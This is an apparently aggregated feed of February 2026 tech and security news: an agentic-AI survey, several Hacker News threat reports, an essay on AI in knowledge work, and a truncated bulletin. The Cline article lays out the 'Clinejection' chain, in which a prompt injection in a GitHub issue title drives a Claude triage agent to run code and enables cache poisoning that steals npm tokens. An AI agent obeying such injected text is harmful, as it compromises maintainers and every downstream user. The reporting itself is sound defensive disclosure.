Friday, February 20, 2026

State of Agentic AI Report: Key Findings

Based on Docker’s State of Agentic AI report, a global survey of more than 800 developers, platform engineers, and technology decision-makers, this blog summarizes key findings of what’s really happening as agentic AI scales within organizations. Drawing on insights from decision-makers and purchase influencers worldwide, we’ll give you a preview on not only where teams are seeing early wins but also what’s still missing to move from experimentation to enterprise-grade adoption.

Rapid adoption, early maturity

60% of organizations already have AI agents in production, and 94% view building agents as a strategic priority, but most deployments remain internal and focused on productivity and operational efficiency.

Security and complexity are the top barriers

40% of respondents cite security as the #1 challenge in scaling agentic AI, with 45% struggling to ensure tools are secure and enterprise-ready. Technical complexity compounds the challenge. One in three organizations (33%) report orchestration difficulties as multi-model and multi-cloud environments proliferate (79% of organizations run agents across two or more environments).

MCP shows promise but isn’t enterprise-ready

85% of teams are familiar with the Model Context Protocol (MCP), yet most report significant security, configuration, and manageability issues that prevent production-scale deployment.

Want the full picture? Download the latest State of Agentic AI report to explore deeper insights and practical recommendations for scaling agentic AI in your organization.

Fear of vendor lock-in is real

Enterprises worry about dependencies in core agent and agentic infrastructure layers such as model hosting, LLM providers, and even cloud platforms. Seventy-six percent of global  respondents report active concerns about vendor lock-in, rising to 88% in France, 83%
in Japan, and 82% in the UK. 

Containerization remains foundational

94% use containers for agent development or production, and 98% follow the same cloud-native workflows as traditional software, establishing containers as the proven substrate for agentic AI infrastructure.

Long-term outlook

Rather than a “year of the agents,” the data points to a decade-long transformation. Organizations are laying the governance and trust foundations now for scalable, enterprise-grade agent ecosystems.

agentic ai blog

The path forward

The path forward doesn’t require reinvention so much as consolidation around a trust layer: access to trusted content and components that can be safely discovered and reused; secure-by-default runtimes; standardized orchestration and policy; and portable, auditable packaging. Agentic AI’s near-term value is already real in internal workflows; unlocking the next wave depends on standardizing how we secure, orchestrate, and ship agents. Teams that invest now in this trust layer, on top of the container foundations they already know, will be first to scale agents from local productivity to durable, enterprise-wide outcomes.

Download the full Agentic AI report for more insights and recommendations on how to scale agents for enterprise.  

Learn more:



from Docker https://ift.tt/JVmlhNx
via IFTTT

BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration

Threat actors have been observed exploiting a recently disclosed critical security flaw impacting BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) products to conduct a wide range of malicious actions, including deploying VShell and 

The vulnerability, tracked as CVE-2026-1731 (CVSS score: 9.9), allows attackers to execute operating system commands in the context of the site user.

In a report published Thursday, Palo Alto Networks Unit 42 said it detected the security flaw being actively exploited in the wild for network reconnaissance, web shell deployment, command-and-control (C2), backdoor and remote management tool installs, lateral movement, and data theft.

The campaign has targeted financial services, legal services, high technology, higher education, wholesale and retail, and healthcare sectors across the U.S., France, Germany, Australia, and Canada.

The cybersecurity company described the vulnerability as a case of sanitization failure that enables an attacker to leverage the affected "thin-scc-wrapper" script that's reachable via WebSocket interface to inject and execute arbitrary shell commands in the context of the site user.

"While this account is distinct from the root user, compromising it effectively grants the attacker control over the appliance's configuration, managed sessions and network traffic," security researcher Justin Moore said.

The current scope of attacks exploiting the flaw range from reconnaissance to backdoor deployment -

  • Using a custom Python script to gain access to an administrative account.
  • Installing multiple web shells across directories, including a PHP backdoor that's capable of executing raw PHP code or running arbitrary PHP code without writing new files to disk, as well as a bash dropper that establishes a persistent web shell.
  • Deploying malware such as VShell and Spark RAT.
  • Using out-of-band application security testing (OAST) techniques to validate successful code execution and fingerprint compromised systems.
  • Executing commands to stage, compress and exfiltrate sensitive data, including configuration files, internal system databases and a full PostgreSQL dump, to an external server.

"The relationship between CVE-2026-1731 and CVE-2024-12356 highlights a localized, recurring challenge with input validation within distinct execution pathways," Unit 42 said.

"CVE-2024-12356's insufficient validation was using third-party software (postgres), while CVE-2026-1731's insufficient validation problem occurred in the BeyondTrust Remote Support (RS) and older versions of the BeyondTrust Privileged Remote Access (PRA) codebase."

With CVE-2024-12356 exploited by China-nexus threat actors like Silk Typhoon, the cybersecurity company noted that CVE-2026-1731 could also be a target for sophisticated threat actors.

The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) updated its Known Exploited Vulnerabilities (KEV) catalog entry for CVE-2026-1731 to confirm that the bug has been exploited in ransomware campaigns.



from The Hacker News https://ift.tt/JPkxWXy
via IFTTT

Cline CLI 2.3.0 Supply Chain Attack Installed OpenClaw on Developer Systems

In yet another software supply chain attack, the open-source, artificial intelligence (AI)-powered coding assistant Cline CLI was updated to stealthily install OpenClaw, a self-hosted autonomous AI agent that has become exceedingly popular in the past few months.

"On February 17, 2026, at 3:26 AM PT, an unauthorized party used a compromised npm publish token to publish an update to Cline CLI on the NPM registry: cline@2.3.0," the maintainers of the Cline package said in an advisory. "The published package contains a modified package.json with an added postinstall script: 'postinstall": "npm install -g openclaw@latest.'"

As a result, this causes OpenClaw to be installed on the developer's machine when Cline version 2.3.0 is installed. Cline said no additional modifications were introduced to the package and there was no malicious behavior observed. However, it noted that the installation of OpenClaw was not authorized or intended.

The supply chain attack affects all users who installed the Cline CLI package published on npm, specifically version 2.3.0, during an approximately eight-hour window between 3:26 a.m. PT and 11:30 a.m. PT on February 17, 2026. The incident does not impact Cline's Visual Studio Code (VS Code) extension and JetBrains plugin.

To mitigate the unauthorized publication, Cline maintainers have released version 2.4.0. Version 2.3.0 has since been deprecated and the compromised token has been revoked. Cline also said the npm publishing mechanism has been updated to support OpenID Connect (OIDC) via GitHub Actions.

In a post on X, the Microsoft Threat Intelligence team said it observed a "small but noticeable uptick" in OpenClaw installations on February 17, 2026, as a result of the supply chain compromise of the Cline CLI package. According to StepSecurity, the compromised Cline package was downloaded roughly 4,000 times during the eight-hour stretch.

Users are advised to update to the latest version, check their environment for any unexpected installation of OpenClaw, and remove it if not required.

"Overall impact is considered low, despite high download counts: OpenClaw itself is not malicious, and the installation does not include the installation/start of the Gateway daemon," Endor Labs researcher Henrik Plate said.

"Still, this event emphasizes the need for package maintainers to not only enable trusted publishing, but also disable publication through traditional tokens – and for package users to pay attention to the presence (and sudden absence) of corresponding attestations."

Leveraging Clinejection to Leak Publication Secrets

While it's currently not clear who is behind the breach of the npm package and what their end goals were, it comes after security researcher Adnan Khan discovered that attackers could steal the repository's authentication tokens through prompt injection by taking advantage of the fact that it is configured to automatically triage any incoming issue raised on GitHub.

"When a new issue is opened, the workflow spins up Claude with access to the repository and a broad set of tools to analyze and respond to the issue," Khan explained. "The intent: automate first-response to reduce maintainer burden."

But a misconfiguration in the workflow meant that it gave Claude excessive permissions to achieve arbitrary code execution within the default branch. This aspect, combined with a prompt injection embedded within the GitHub issue title, could be exploited by an attacker with a GitHub account to trick the AI agent into running arbitrary commands and compromise production releases.

This shortcoming, which builds up PromptPwnd, has been codenamed Clinejection. It was introduced in a source code commit made on December 21, 2025. The attack chain is outlined below -

  • Prompt Claude to run arbitrary code in issue triage workflow
  • Evict legitimate cache entries by filling the cache with more than 10GB of junk data, triggering GitHub's Least Recently Used (LRU) cache eviction policy
  • Set poisoned cache entries matching the nightly release workflow's cache keys
  • Wait for the nightly publish to run at around 2 a.m. UTC and trigger on the poisoned cache entry

"This would allow an attacker to obtain code execution in the nightly workflow and steal the publication secrets," Khan noted. "If a threat actor were to obtain the production publish tokens, the result would be a devastating supply chain attack."

"A malicious update pushed through compromised publication credentials would execute in the context of every developer who has the extension installed and set to update automatically."

In other words, the attack sequence employs GitHub Actions cache poisoning to pivot from the triage workflow to a highly privileged workflow, such as the Publish Nightly Release and Publish NPM Nightly workflows, and steal the nightly publication credentials, which have the same access as those used for production releases.

As it turns out, this is exactly what happened, with the unknown threat actor weaponizing an active npm publish token (referred to as NPM_RELEASE_TOKEN or NPM_TOKEN) to authenticate with the Node.js registry and publish Cline version 2.3.0.

"We have been talking about AI supply chain security in theoretical terms for too long, and this week it became an operational reality," Chris Hughes, VP of Security Strategy at Zenity, said in a statement shared with The Hacker News. "When a single issue title can influence an automated build pipeline and affect a published release, the risk is no longer theoretical. The industry needs to start recognizing AI agents as privileged actors that require governance."



from The Hacker News https://ift.tt/nQ7s1dY
via IFTTT

ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT RAT

Cybersecurity researchers have disclosed details of a new ClickFix campaign that abuses compromised legitimate sites to deliver a previously undocumented remote access trojan (RAT) called MIMICRAT (aka AstarionRAT).

"The campaign demonstrates a high level of operational sophistication: compromised sites spanning multiple industries and geographies serve as delivery infrastructure, a multi-stage PowerShell chain performs ETW and AMSI bypass before dropping a Lua-scripted shellcode loader, and the final implant communicates over HTTPS on port 443 using HTTP profiles that resemble legitimate web analytics traffic," Elastic Security Labs said in a Friday report.

According to the enterprise search and cybersecurity company, MIMICRAT is a custom C++ RAT with support for Windows token impersonation, SOCKS5 tunneling, and a set of 22 commands for comprehensive post-exploitation capabilities. The campaign was discovered earlier this month.

It's also assessed to share tactical and infrastructural overlaps with another ClickFix campaign documented by Huntress that leads to the deployment of the Matanbuchus 3.0 loader, which then serves as a conduit for the same RAT. The end goal of the attack is suspected to be ransomware deployment or data exfiltration.

In the infection sequence highlighted by Elastic, the entry point is bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached to inject malicious JavaScript code that's responsible for loading an externally hosted PHP script. The PHP script then proceeds to deliver the ClickFix lure by displaying a fake Cloudflare verification page and instructing the victim to copy and paste a command into the Windows Run dialog to address the issue.

This, in turn, leads to the execution of a PowerShell command, which then contacts a command-and-control (C2) server to fetch a second-stage PowerShell script that patches Windows event logging (ETW) and antivirus scanning (AMSI) before dropping a Lua-based loader. In the final stage, the Lua script decrypts and executes in memory shellcode that delivers MIMICRAT.

The Trojan uses HTTPS for communicating with the C2 server, allowing it to accept two dozen commands for process and file system control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling.

"The campaign supports 17 languages, with the lure content dynamically localized based on the victim's browser language settings to broaden its effective reach," security researcher Salim Bitam said. "Identified victims span multiple geographies, including a USA-based university and multiple Chinese-speaking users documented in public forum discussions, suggesting broad opportunistic targeting."



from The Hacker News https://ift.tt/02TtW9z
via IFTTT

Ukrainian National Sentenced to 5 Years in North Korea IT Worker Fraud Case

A 29-year-old Ukrainian national has been sentenced to five years in prison in the U.S. for his role in facilitating North Korea's fraudulent information technology (IT) worker scheme.

In November 2025, Oleksandr "Alexander" Didenko pleaded guilty to wire fraud conspiracy and aggravated identity theft for stealing the identities of U.S. citizens and selling them to IT workers to help them land jobs at 40 U.S. companies and draw regular salaries, which were then funneled back to the regime to support its weapons programs. He was apprehended by Polish authorities in late 2024, and later extradited to the U.S.

Didenko has also been ordered to serve 12 months of supervised release and to pay $46,547.28 in restitution. Last year, Didenko also agreed to forfeit more than $1.4 million, which includes about $181,438 in U.S. dollars and cryptocurrency seized from him and his co-conspirators.

The defendant is said to have run a website named Upworksell[.]com to help overseas IT workers buy or rent stolen or borrowed identities since the start of 2021. The IT workers abused these identities to apply for jobs on freelance work platforms based in California and Pennsylvania. The site was seized by authorities on May 16, 2024.

In addition, Didenko paid individuals in the U.S. to receive and host laptops at their residences in Virginia, Tennessee and California. The idea was to give the impression that the workers were located in the country, when, in reality, they were connecting remotely from countries like China, where they were dispatched to.

As part of the criminal scheme, Didenko managed as many as 871 proxy identities and facilitated the operation of at least three U.S.-based laptop farms. One of the computers was sent to a laptop farm run by Christina Marie Chapman in Arizona. Chapman was arrested in May 2024 and sentenced to 102 months in prison in July 2025 for participating in the scheme.

Furthermore, he enabled his North Korean clients to access the U.S. financial system through Money Service Transmitters instead of having to open an account at a bank within the U.S. These money transfer services were used to move employment income to foreign bank accounts. Officials said Didenko's clients were paid hundreds of thousands of dollars for their work.

"Defendant Didenko's scheme funneled money from Americans and U.S. businesses, into the coffers of North Korea, a hostile regime," said U.S. Attorney Jeanine Ferris Pirro. "Today, North Korea is not only a threat to the homeland from afar, it is an enemy within."

"By using stolen and fraudulent identities, North Korean actors are infiltrating American companies, stealing information, licensing, and data that is harmful to any business. But more than that, money paid to these so-called employees goes directly to munitions programs in North Korea."

Despite continued law enforcement actions, the Hermit Kingdom's conspiracy shows no signs of stopping. If anything, the operation has continued to evolve with new tactics and techniques to evade detection.

According to a report from threat intelligence firm Security Alliance (SEAL) last week, the IT workers have begun to apply for remote positions using real LinkedIn accounts of individuals they're impersonating in an effort to make their fraudulent applications look authentic.



from The Hacker News https://ift.tt/8QnOKWd
via IFTTT

FBI Reports 1,900 ATM Jackpotting Incidents Since 2020, $20M Lost in 2025

The U.S. Federal Bureau of Investigation (FBI) has warned of an increase in ATM jackpotting incidents across the country, leading to losses of more than $20 million in 2025.

The agency said 1,900 ATM jackpotting incidents have been reported since 2020, out of which 700 took place last year. In December 2025, the U.S. Department of Justice (DoJ) said about $40.73 million has been collectively lost to jackpotting attacks since 2021.

"Threat actors exploit physical and software vulnerabilities in ATMs and deploy malware to dispense cash without a legitimate transaction," the FBI said in a Thursday bulletin.

The jackpotting attacks involve the use of specialized malware, such as Ploutus, to infect ATMs and force them to dispense cash. In most cases, cybercriminals have been observed gaining unauthorized access to the machines by opening an ATM face with widely available generic keys.

Cybersecurity

There are at least two different ways by which the malware is deployed: Removing the ATM's hard drive, followed by either connecting it to their computer, copying it to the hard drive, attaching it back to the ATM, and rebooting the ATM, or replacing it entirely with a foreign hard drive preloaded with the malware and rebooting it.

Regardless of the method used, the end result is the same. The malware is designed to interact directly with the ATM hardware, thereby getting around any security controls present in the original ATM software.

Because the malware does not require a connection to an actual bank card or customer account to dispense cash, it can be used against ATMs of different manufacturers with little to no code changes, as the underlying Windows operating system is exploited during the attack.

Ploutus was first observed in Mexico in 2013. Once installed, it grants threat actors complete control over an ATM, enabling them to trigger cash-outs that the FBI said can occur in minutes and are harder to detect until after the money is withdrawn.

"Ploutus malware exploits the eXtensions for Financial Services (XFS), the layer of software that instructs an ATM what to physically do," the FBI explained.

Cybersecurity

"When a legitimate transaction occurs, the ATM application sends instructions through XFS for bank authorization. If a threat actor can issue their own commands to XFS, they can bypass bank authorization entirely and instruct the ATM to dispense cash on demand."

The agency has outlined a long list of recommendations that organizations can adopt to mitigate jackpotting risks. This includes tightening physical security by installing threat sensors, setting up security cameras, and changing standard locks on ATM devices.

Other measures involve auditing ATM devices, changing default credentials, configuring an automatic shutdown mode once indicators of compromise are detected, enforcing device allowlisting to prevent connection of unauthorized devices, and maintaining logs.

Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/uaRLPy0
via IFTTT

Thursday, February 19, 2026

What will knowledge work be in 18 months? Look at what AI is doing to coding right now.

There’s a lot of buzz about something big happening in software engineering thanks to the latest batch of AI models. However, most knowledge workers think this is just a “coding thing” which doesn’t apply to them. They’re wrong.

Dan Shapiro, Glowforge CEO and Wharton Research Fellow, recently published a five-level framework which maps the level of AI assistance for coding from simple searches all the way to a “dark factory,” where AI is essentially just a black box that turns specs into software.

I want to walk through those five levels, because I think this pattern also applies to knowledge work, and we knowledge workers are not far behind coders in this regard.

Shapiro’s five levels of AI use in coding

(I’ve condensed but mostly used his words here)

  • Level 0: AI is spicy autocomplete. You’re doing manual coding and not a character hits the disk without your approval. You might use AI as a search super search engine, or occasionally accept a suggestion, but the code is unmistakably yours.
  • Level 1: AI is a coding intern. You offload discrete tasks to AI. “Write a unit test.” “Add a docstring.” You’re seeing speedups, but you’re still moving at the rate you type.
  • Level 2: AI is a junior developer. You’re a “pair programmer” with AI and now have a junior buddy to hand off all your boring stuff to. You code in a flow state and are more productive than you’ve ever been. Shapiro says 90% of “AI-native” developers are here, and the danger is from level 2, and every level after it, the coder feels like they’ve maxed out and they’re done. But they’re not.
  • Level 3: AI is a developer. You’re not the developer anymore. (That’s your AI’s job.) You’re the manager. You’re the human in the loop. Your coding agent is always running in multiple tabs, and you spend your days reviewing code and changes. For many people, this feels like things got worse. Almost everyone tops out here.
  • Level 4: AI is an engineering team. Now you’re not even a developer manager, you’re a product manager. You write specs, argue with the AI about specs, craft skills plan schedules, then leave for 12 hours and check if the tests pass. (Shapiro says he’s here.)
  • Level 5: AI is a dark software factory. You’re the engineering manager who sets the goals of the system in plain English. The AI defines implementation, writes code, tests, fixes bugs, and ships. It’s not really a software process anymore. It’s a black box that turns specs into software.

AI + coding future thinking also applies to AI + knowledge work

Nate B. Jones covers the AI-and-software engineering beat better than almost anyone. His YouTube videos are “required watching” for me. I realized recently that everything he says about how AI is impacting software engineering also applies to AI impacting knowledge workers. For example, some quotes of his from recent videos about coding which apply verbatim to knowledge worker using AI:

“The bottleneck has shifted. You are now the manager of however many agents you can keep track of productively. Your productive capacity is limited now only by your attention span and your ability to scope tasks well.”

“These are supervision problems, not capability problems. And the solution isn’t to do the work yourself. It’s to get better at your management skills.”

If we do some simple Mad Libs style find-and-replace, Nate’s also a pretty good “future of work” strategist! Just swap out:

  • code → deliverables / work product / output
  • engineer → knowledge worker
  • technical leader → business leader
  • implementation → producing deliverables
  • system → outcome
  • tests → success criteria
  • codebase → work stream
  • syntax → formatting

Let’s try that on some more quotes from his recent videos:

“It’s less time writing code deliverables. It’s much more time defining what you want. It’s much more time evaluating whether you got there.”

“Most engineers knowledge workers have spent years developing their intuitions around implementation producing deliverables and those are now not super useful. The new skill is describing the system outcome precisely enough that AI can build it, and then writing tests success criteria that capture what you actually need, and reviewing AI-generated code output for subtle conceptual errors rather than simple syntax formatting mistakes.”

“If you’re not thinking through what you want done, the speed can lead you to very quickly build a giant pile of code work product that’s not very useful. That is a superpower that everyone has been handed for better or worse and we are about to see who is actually able to think well.”

“We need to think as technical business leaders about where engineers knowledge workers should stand in relation to the code AI-generated output based on the risk profile of that codebase work stream itself.”

That last one is illustrates the power of this perfectly. That concept applies to software engineering, but I never would have thought about it in the context of knowledge work. Yet it 100% applies there as well. Which strategic deliverables require human review and which can you trust to the Dark Knowledge Factory? 

The five levels of AI use in knowledge work

Now let’s take Shapiro’s five levels of AI use in coding and translate them to knowledge work. (Some of these loosely map to my own 7-stage roadmap for human-AI collaboration in the workplace from six months ago, though Shapiro’s levels address the relationship between humans and AI, whereas I focused on the mechanics of the collaboration.)

Putting Shapiro’s coding levels through our Mad Libs code-to-knowledge work translator:

  • Level 0: AI is a spicy search engine. You’re doing the knowledge work and not a word hits the page without your approval. You might use AI as a super search engine, or occasionally accept a suggested sentence, but the deliverable is unmistakably yours. This is most enterprise knowledge workers today.
  • Level 1: AI is a research intern. You offload discrete tasks to AI. “Summarize this document.” “Draft a response to this email.” You’re seeing speedups, but you’re still moving at the rate you type. You’re still the one producing the deliverable. This is most people’s experience with Office Copilot
  • Level 2: AI is a junior analyst. You’re “pair working” with AI and now have a junior buddy to hand off all your boring stuff to. You’re in a flow state and more productive than you’ve ever been. Workers at this level use persistent AI collaboration spaces, like Google NotebookLM, Claude Projects, or Copilot Notebooks. Like their coding counterparts, starting at Level 2 and every level after it, knowledge workers feel like once they’re here that they’re done and they’ve maxed out. But they haven’t.
  • Level 3: AI is an analyst. You’re not the one producing work anymore. (That’s your AI’s job.) You’re the manager. You’re the human in the loop. Your AI is always running and you spend your days reviewing and editing everything it generates. Strategy decks, market analyses, competitive intelligence, communications. Your life is tracked changes. For some workers, this feels like things got worse. Almost everyone tops out here. This is where workers using a personal AI knowledge system / “second brain” are. This is where I am.
  • Level 4: AI is a strategy team. Now you’re not even a manager, you’re a director. You don’t write deliverables or even review them line by line. You write specs for deliverables. You define what a good competitive analysis looks like, what the acceptance criteria are, and what scenarios it needs to handle. You craft the prompts, system instructions, and the evaluation rubrics. Then you walk away and check if the output passes your scenarios.
  • Level 5: AI is a dark knowledge factory. You are the executive who sets the goals of the organization in plain English. The AI defines the approach, produces deliverables, evaluates quality, iterates, and ships. It’s not really a work process anymore. It’s a black box that turns business intent into business outcomes. A handful of people run what used to be an entire analyst function. The verification framework is the intellectual property, not the reports themselves.

But how do you know the AI’s work is any good?

I feel like I can follow along the analogy through Level 3, but Levels 4 and 5 seem weird to me and it’s hard to see exactly how they would apply to knowledge work. (Heh, funny I’m personally at Level 3 and as Shapiro wrote, people after Level 2 think that whatever level they’re at is the top.)

The hardest question at Levels 4 and 5 is the same whether you’re writing code or strategy memos: how do you verify the output without a human reviewing every piece?

In code, the answer turned out to be end-to-end behavioral tests stored separately from the codebase (so the AI can’t cheat). For knowledge work, I think it maps to something like:

  • You define what “good” looks like (for a strategy recommendation, a presentation, etc.) and you deliberately keep those separate from the AI so it can’t game the criteria. These need to be real and deep things, like “Does this account for the competitor’s likely response? Does this identify second-order effects? Would the CFO approve this?”
  • Then once the main AI generates the content, a different AI uses your verification docs and is prompted to be a skeptical board member, a hostile competitor, or a regulatory lawyer and tries to find flaws. So this way, the verification loop isn’t human, it’s AI verifying AI against criteria that humans defined.

(There will be a lot of interesting work done here in the next year!)

AI’s true impact to knowledge work is just beginning

As I wrote in the opening, most talk about AI’s impact today is focused on software engineering. But coding was the beachhead, not the destination. Software was first because code has built-in verification layers, specific syntax, and billions of pages on the internet about how to write good code.

Knowledge work is next, but the timeline will be more compressed. (We have better AI now and lots of lessons from the software world.) If frontier coding teams are at Level 4-5 today while frontier knowledge workers are only at Level 1-2, a pretty good way to know what knowledge work looks like in 18 months is to look at what coders are doing right now.

As we progress towards this future, remember that the bottleneck keeps moving. At Level 1 it’s, “how fast can you produce work?” At Level 4 it’s, “how precisely can you specify what should exist?” By Level 5 it’s, “how rigorously can you verify that it’s good?” Level 5 of knowledge work will introduce a governance problem that nobody has a playbook for yet. Who owns the specs? Who defines the verifications? Who’s making sure the Dark Knowledge Factory isn’t producing hallucinated strategy recommendations that look right but fall apart under scrutiny?

Most enterprises don’t have the governance infrastructure for any of this, and it’s coming whether they’re ready or not.


Read more & connect

Join the conversation and discuss this post on LinkedIn. You can find all my posts on my author page (or via RSS).



from Citrix Blogs https://ift.tt/yGRPxQp
via IFTTT

ThreatsDay Bulletin: OpenSSL RCE, Foxit 0-Days, Copilot Leak, AI Password Flaws & 20+ Stories

  1. Privacy model hardening

    Google announced the first beta version of Android 17, with two privacy and security enhancements: the deprecation of Cleartext Traffic Attribute and support for HPKE Hybrid Cryptography to enable secure communication using a combination of public key and symmetric encryption (AEAD). "If your app targets (Android 17) or higher and relies on usesCleartextTraffic='true' without a corresponding Network Security Configuration, it will default to disallowing cleartext traffic," Google said. "You are encouraged to migrate to Network Security Configuration files for granular control."

  2. RaaS expands cross-platform reach

    A new analysis of the LockBit 5.0 ransomware has revealed that the Windows version packs in various defense evasion and anti-analysis techniques, including packing, DLL unhooking, process hollowing, patching Event Tracing for Windows (ETW) functions, and log clearing. "What's notable among the multiple systems support is its proclaimed capability to 'work on all versions of Proxmox,'" Acronis said. "Proxmox is an open-source virtualization platform and is being adopted by enterprises as an alternative to commercial hypervisors, which makes it another prime target of ransomware attacks." The latest version also introduces dedicated builds tailored for enterprise environments, highlighting the continued evolution of ransomware-as-a-service (RaaS) operations.

  3. Mac users lured via nested obfuscation

    Cybersecurity researchers have detailed a new evolution of the ClickFix social engineering tactic targeting macOS users. "Dubbed Matryoshka due to its nested obfuscation layers, this variant uses a fake installation/fix flow to trick victims into executing a malicious Terminal command," Intego said. "While the ClickFix tactic is not new, this campaign introduces stronger evasion techniques — including an in-memory, compressed wrapper and API-gated network communications — designed to hinder static analysis and automated sandboxes." The campaign primarily targets users attempting to visit software review sites, leveraging typosquatting in the URL name to redirect them to fake sites and activate the infection chain.

  4. Loader pipeline drives rapid domain takeover

    Another new ClickFix campaign detected in February 2026 has been observed delivering a malware-as-a-service (MaaS) loader known as Matanbuchus 3.0. Huntress, which dissected the attack chain, said the ultimate objective of the intrusion was to deploy ransomware or exfiltrate data based on the fact that the threat actor rapidly progressed from initial access to lateral movement to domain controllers via PsExec, rogue account creation, and Microsoft Defender exclusion staging. The attack also led to the deployment of a custom implant dubbed AstarionRAT that supports 24 commands to facilitate credential theft, SOCKS5 proxy, port scanning, reflective code loading, and shell execution. According to data from the cybersecurity company, ClickFix fueled 53% of all malware loader activity in 2025.

  5. Typosquat chain targets macOS credentials

    In yet another ClickFix campaign, threat actors are relying on the "reliable trick" to host malicious instructions on fake websites disguised as Homebrew ("homabrews[.]org") to trick users into pasting them on the Terminal app under the pretext of installing the macOS package manager. In the attack chain documented by Hunt.io, the commands in the typosquatted Homebrew domain are used to deliver a credential-harvesting loader and a second-stage macOS infostealer dubbed Cuckoo Stealer. "The injected installer looped on password prompts using 'dscl . -authonly,' ensuring the attacker obtained working credentials before deploying the second stage," Hunt.io said. "Cuckoo Stealer is a full-featured macOS infostealer and RAT: It establishes LaunchAgent persistence, removes quarantine attributes, and maintains encrypted HTTPS command-and-control communications. It collects browser credentials, session tokens, macOS Keychain data, Apple Notes, messaging sessions, VPN and FTP configurations, and over 20 cryptocurrency wallet applications." The use of "dscl . -authonly" has been previously observed in attacks deploying Atomic Stealer.

  6. Phobos affiliate detained in Europe

    Authorities from Poland's Central Bureau for Combating Cybercrime (CBZC) have detained a 47-year-old man over suspected ties to the Phobos ransomware group. He faces a potential prison sentence of up to five years. The CBZC said the "47-year-old used encrypted messaging to contact the Phobos criminal group, known for conducting ransomware attacks," adding the suspect's devices contained logins, passwords, credit card numbers, and server IP addresses that could have been used to launch "various attacks, including ransomware." The arrest is part of Europol's Operation Aether, which targets the 8Base ransomware group, believed to be linked to Phobos. It has been almost exactly a year since international law enforcement dismantled the 8Base crew. More than 1,000 organizations around the world have been targeted in Phobos ransomware attacks, and the cybercriminals are believed to have obtained over $16 million in ransom payments.

  7. Industrial ransomware surge accelerates

    There has been a sharp rise in the number of ransomware groups targeting industrial organizations as cybercriminals continue to exploit vulnerabilities in operational technology (OT) and industrial control systems (ICS), Dragos warned. A total of 119 ransomware groups targeting industrial organizations were tracked during 2025, a 49% increase from the 80 tracked in 2024. 2025 saw 3,300 industrial organizations around the world hit by ransomware, compared with 1693 in 2024. The most targeted sector was manufacturing, followed by transportation. In addition, a hacking group tracked as Pyroxene has been observed conducting "supply chain-leveraged attacks targeting defense, critical infrastructure, and industrial sectors, with operations expanding from the Middle East into North America and Western Europe." It often leverages initial access provided by PARISITE, to enable movement from IT into OT networks. Pyroxene overlaps with activity attributed to Imperial Kitten (aka APT35), a threat actor affiliated with the cyber arm of the Islamic Revolutionary Guard Corps (IRGC).

  8. Copilot bypassed DLP safeguards

    Microsoft confirmed a bug (CW1226324) that let Microsoft 365 Copilot summarize confidential emails from Sent Items and Drafts folders since January 21, 2026, without users' permission, bypassing data loss prevention (DLP) policies put in place to safeguard sensitive data. A fix was deployed by the company on February 3, 2026. However, the company did not disclose how many users or organizations were affected. "Users' email messages with a confidential label applied are being incorrectly processed by Microsoft 365 Copilot chat," Microsoft said. "The Microsoft 365 Copilot "work tab" Chat is summarizing email messages even though these email messages have a sensitivity label applied, and a DLP policy is configured. A code issue is allowing items in the sent items and draft folders to be picked up by Copilot even though confidential labels are set in place."

  9. Jira trials weaponized for spam

    Threat actors are abusing the trust and reputation associated with Atlassian Jira Cloud and its connected email system to run automated spam campaigns and bypass traditional email security. To accomplish this, the operators created Atlassian Cloud trial accounts using randomized naming conventions, allowing them to generate disposable Jira Cloud instances at scale. "Emails were tailored to target specific language groups, targeting English, French, German, Italian, Portuguese, and Russian speakers — including highly skilled Russian professionals living abroad," Trend Micro said. "These campaigns not only distributed generic spam, but also specifically targeted sectors such as government and corporate entities." The attacks, active from late December 2025 through late January 2026, primarily targeted organizations using Atlassian Jira. The goal was to get recipients to open the emails and click on malicious links, which would initiate a redirect chain powered by the Keitaro Traffic Distribution System (TDS) and then finally lead them to pages peddling investment scams and online casino landing sites, suggesting that financial gain was likely the main objective.

  10. GitLab SSRF now federally mandated patch

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA), on February 18, 2026, added CVE-2021-22175 to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patch by March 11, 2026. "GitLab contains a server-side request forgery (SSRF) vulnerability when requests to the internal network for webhooks are enabled," CISA said. In March 2025, GreyNoise revealed that a cluster of about 400 IP addresses was actively exploiting multiple SSRF vulnerabilities, including CVE-2021-22175, to target susceptible instances in the U.S., Germany, Singapore, India, Lithuania, and Japan.

  11. Telegram bots fuel Fortune 500 phishing

    An elusive, financially motivated threat actor dubbed GS7 has been targeting Fortune 500 companies in a new phishing campaign that leverages trusted company branding with lookalike websites aimed at harvesting credentials via Telegram bots. The campaign, codenamed Operation DoppelBrand, targets top financial institutions, including Wells Fargo, USAA, Navy Federal Credit Union, Fidelity Investments, and Citibank, as well as technology, healthcare, and telecommunications firms worldwide. Victims are lured through phishing emails and redirected to counterfeit pages where credentials are harvested and transmitted to Telegram bots controlled by the attacker. According to SOCRadar, the group itself, however, has a history stretching back to 2022. The threat actor is said to have registered more than 150 malicious domains in recent months using registrars such as NameCheap and OwnRegistrar, and routing traffic through Cloudflare to evade detection. GS7's end goals include not only harvesting credentials, but also downloading remote management and monitoring (RMM) tools like LogMeIn Resolve on victim systems to enable remote access or the deployment of malware. This has raised the possibility that the group may even act as an initial access broker (IAB), selling the access to ransomware groups or other affiliates.

  12. Remcos shifts to live C2 surveillance

    Phishing emails disguised as invoices, job offers, or government notices are being used to distribute a new variant of Remcos RAT to facilitate comprehensive surveillance and control over infected systems. "The latest Remcos variant has been observed exhibiting a significant change in behaviour compared to previous versions," Point Wild said. "Instead of stealing and storing data locally on the infected system, this variant establishes direct online command-and-control (C2) communication, enabling real-time access and control. In particular, it leverages the webcam to capture live video streams, allowing attackers to monitor targets remotely. This shift from local data exfiltration to live, online surveillance represents an evolution in Remcos’ capabilities, increasing the risk of immediate espionage and persistent monitoring."

  13. China-made vehicles restricted on bases

